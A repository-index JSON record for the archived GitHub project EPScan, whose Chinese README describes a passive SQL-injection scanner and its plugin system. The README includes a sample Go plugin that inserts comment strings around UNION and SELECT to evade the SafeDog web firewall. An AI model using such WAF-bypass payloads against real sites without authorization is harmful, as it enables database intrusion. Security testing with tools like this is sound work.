{"id":13841804,"url":"https://github.com/ExpLangcn/EPScan","last_synced_at":"2025-07-11T13:32:35.542Z","repository":{"id":63343715,"uuid":"567090181","full_name":"ExpLangcn/EPScan","owner":"ExpLangcn","description":"被动收集资产并自动进行SQL注入检测（插件化 自动Bypass）、XSS检测、RCE检测、敏感信息检测","archived":true,"fork":false,"pushed_at":"2023-11-29T06:37:09.000Z","size":2565,"stargazers_count":194,"open_issues_count":1,"forks_count":18,"subscribers_count":11,"default_branch":"main","last_synced_at":"2024-08-05T17:29:07.086Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ExpLangcn.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-11-17T03:26:53.000Z","updated_at":"2024-08-04T14:16:50.000Z","dependencies_parsed_at":"2023-11-29T07:42:24.201Z","dependency_job_id":null,"html_url":"https://github.com/ExpLangcn/EPScan","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ExpLangcn%2FEPScan/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ExpLangcn","download_url":"https://codeload.github.com/ExpLangcn/EPScan/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729679,"owners_count":17515154,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:21.486Z","updated_at":"2024-11-21T12:30:25.777Z","avatar_url":"https://github.com/ExpLangcn.png","language":"Go","readme":"**停止更新（归档处理），请关注后续项目**\n\n**[点击关注 Twitter](https://twitter.com/ExpLang_Cn) 以便快速了解我的动态.**\n\n----\n\n# EPScan\n被动收集资产并自动进行SQL注入检测（插件化 自动Bypass）、XSS检测、RCE检测、敏感信息检测\n\n## 注意\n\n~~**由于Golang-Plus的特性，所以Windows不支持Bypass插件，Mac和Linux支持，请下载Plus对应系统的插件否则会报错。**~~\n\n~~**暂时只支持Linux 和 Mac，如果报错 \"panic: plugin: not implemented\" 就是系统不支持Bypass插件**~~\n\n**已改为通过程序内置解释器加载Bypass插件**\n\n## 程序介绍\n- [x] ~~移植SqlMap的检测模式~~\n- [x] ~~SQL注入自动Bypass~~\n- [x] ~~SQL注入支持Get/Post布尔盲注~~\n- [x] ~~SQL注入支持请求头Get/Post报错注入~~\n- [x] ~~SQL注入自动加载Bypass插件~~\n- [x] ~~插件化Payload改造~~\n- [x] ~~插件化Bypass模式~~\n- [ ] 自动更新Bypass插件\n- [ ] XSS漏洞检测\n- [ ] Rce漏洞检测\n- [ ] 敏感信息检测\n- [ ] 主动爬虫+扫描\n\n## 程序截图\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387755-55cb5ad6-c4ea-4cf7-8eb5-be87ab20398a.png width=80% /\u003e\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387795-09e707fc-4c37-48e5-9584-5595dcc0a27e.png width=80% /\u003e\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387548-8b1dfe2b-0b15-4ceb-8385-f0e8d0779529.png width=80% /\u003e\n\n\u003cimg src=https://user-images.githubusercontent.com/52586866/202387599-72faf4e8-d407-4b52-9228-74503ebbad8a.png width=80% /\u003e\n\n## 参数教程\n\n**一定要下载crt并安装证书，否则无法扫描https**\n\n```\n./EPScan -h\n\nUsage of /EPScan:\n  -Wlist string\n        只扫描文件内的Host 文件内一行一条 不可带有http协议\n\t\n  -blist string\n        文件内的Host不扫描 文件内一行一条 不可带有http协议\n\t\n  -deep \tbool \t// 选择后开启，默认不开启，不开效率快但是误报微高\n        深入扫描（降低效率提高准确率）\n\t\n  -pdelay \tstring \t// 需带有http协议头，看例子\n        流量转发（程序的流量转发到指定端口，例如Burp的8080端口: http://127.0.0.1:8080) \n\t\n  -pdir \tstring\t// 加载指定目录下所有的插件，默认不进行Bypass\n        批量加载指定目录下的Bypass插件\n\t\n  -plist \tstring\t// 查看插件信息，默认输出 \"plus/\" 目录下的插件信息\n        查看插件列表和详细信息 (default \"plus/\")\n\t\n  -port \tstring\t// 开启监听端口\n        监听端口配置 (default \"8899\")\n\t\n  -ptest \tstring\t// 测试指定插件效果 会输出原始Payload和处理后的Payload\n        插件测试\n\t\n  -run \t\tbool\t// 开始被动式扫描，例如：./EPScan -pdir plus/ -port 8899 -run\n        开始被动式扫描\n\t\n  -iflength\tbool\t// 过滤Length为-1的结果（降低误报）默认不开启\n  \t过滤Length为-1的结果（降低误报）默认不开启\n\n  -th\t\tint\t// 发包线程 默认10\n  \t发包线程 默认10\n```\n\n**开始被动式扫描**\n\n**一定要下载crt并安装证书，否则无法扫描https**\n\n```\n./EPScan -port 8899 -run\n```\n\n**开始被动式扫描并加载Bypass插件目录**\n\n```\n./EPScan -pdir plus/ -port 8899 -run\n```\n\n## SQL注入Bypass插件编写\n\n**联系微信：backxyh 贡献大于5个插件即可进入内测群（优先发布测试版和最新版，大量优秀Bypass方案及插件共享）**\n\n### 例：\n\n[**点击查看插件样例**](https://github.com/ExpLangcn/EPScan/blob/main/plus/unionalltounion.go)\n\n```\npackage main //包名必须为 \"main\"\n\nimport (\n\t\"strings\"\n)\n\nvar ( // 全局变量必须包含以下三个参数\n\tPlus_Author   = \"ExpLang\"        // 插件作者\n\tPlus_Version  = \"1.0\"            // 插件版本\n\tPlus_Describe = \"Bypass_SafeDog\" // 插件描述\n)\n\nfunc Bypass(Value string) string { // 主函数名必须为 \"Bypass\" 区分大小写，参数为String，返回值为String，思路：传入原始Payload，返回处理后的Payload。\n\n\tvar Value_Bypass string\n\tvar bypass_SafeDog_str = \"/*x^x*/\"\n\tValue_Bypass = strings.Replace(Value, \"UNION\", bypass_SafeDog_str+\"UNION\"+bypass_SafeDog_str, -1) // 寻找指定字符串并全部替换\n\tValue_Bypass = strings.Replace(Value_Bypass, \"SELECT\", bypass_SafeDog_str+\"SELECT\"+bypass_SafeDog_str, -1)\n\n\treturn Value_Bypass // 返回处理后的Payload。\n\t\n}\n\nfunc INFO() []string {\n\treturn []string{Plus_Author, Plus_Version, Plus_Describe} //输出插件信息\n}\n\n```\n### 编译为插件：\n\n```\n./EPScan -pluslist\n\n+----+---------+---------+-------------------------------+-------------------------------+\n| ID | AUTHOR  | VERSION |           DESCRIBE            |             PATH              |\n+----+---------+---------+-------------------------------+-------------------------------+\n| 1  | ExpLang | 1.0     | Bypass_SafeDog                | plus/bypass_SafeDog.go        |\n| 2  | ExpLang | 1.0     | 替换 \"'\" 单引号为 \"%EF%BC%87\"   | plus/bypass_apostrophemask.go |\n| 3  | ExpLang | 1.0     | 测试/演示   \t\t         | plus/bypass_name.go           |\n+----+---------+---------+-------------------------------+-------------------------------+\n```\n\n### 测试插件\n\n```\n./EPScan -ptest \"plus/bypass_name.go\"\n```\n\n----\n\n#### 😄 I’m ExpLang [**Twitter**](https://twitter.com/ExpLang_Cn) 欢迎关注fo～\n","funding_links":[],"categories":["Go"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FExpLangcn%2FEPScan","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FExpLangcn%2FEPScan","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FExpLangcn%2FEPScan/lists"}